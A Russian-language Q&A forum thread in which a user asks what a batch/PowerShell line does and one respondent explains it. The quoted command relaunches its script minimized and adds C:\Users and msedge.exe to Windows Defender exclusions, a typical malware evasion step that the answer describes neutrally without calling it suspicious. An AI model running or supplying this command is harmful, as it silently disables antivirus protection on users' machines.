Что делает эта команда?

Партия Китай Мастер (1322), открыт 1 месяц назад
If not defined is_minimized set is_minimized-1 && start "" /min "%~dpnx0" %* && exit powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users' ; Add-MpPreference -ExLusionsProcess 'msedge.exe' "
1 ответ
Татьяна Просветленный (32581) 1 месяц назад
Эта команда выполняет следующие действия:

Проверяет, задана ли переменная is_minimized:
 If not defined is_minimized set is_minimized=1
Если переменная is_minimized не задана, то она устанавливается в значение 1.

Перезапускает текущий скрипт в минимизированном окне:
 start "" /min "%~dpnx0" %* && exit
Эта часть команды запускает текущий скрипт (%~dpnx0 представляет полный путь к текущему скрипту) в минимизированном окне (/min). Параметр %* передает все аргументы, переданные исходному скрипту, вновь запущенному скрипту. После запуска нового экземпляра скрипта текущий экземпляр завершает работу командой exit.

Выполняет команду PowerShell для добавления исключений в антивирус Windows Defender:
 powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users' ; Add-MpPreference -ExclusionProcess 'msedge.exe' "
Эта команда запускает PowerShell и выполняет две команды:

Add-MpPreference -ExclusionPath 'C:\Users': добавляет путь C:\Users в список исключений антивируса Windows Defender.
Add-MpPreference -ExclusionProcess 'msedge.exe': добавляет процесс msedge.exe в список исключений антивируса Windows Defender.
В результате выполнения этой команды текущий скрипт будет перезапущен в минимизированном окне, а в антивирус Windows Defender будут добавлены указанные исключения.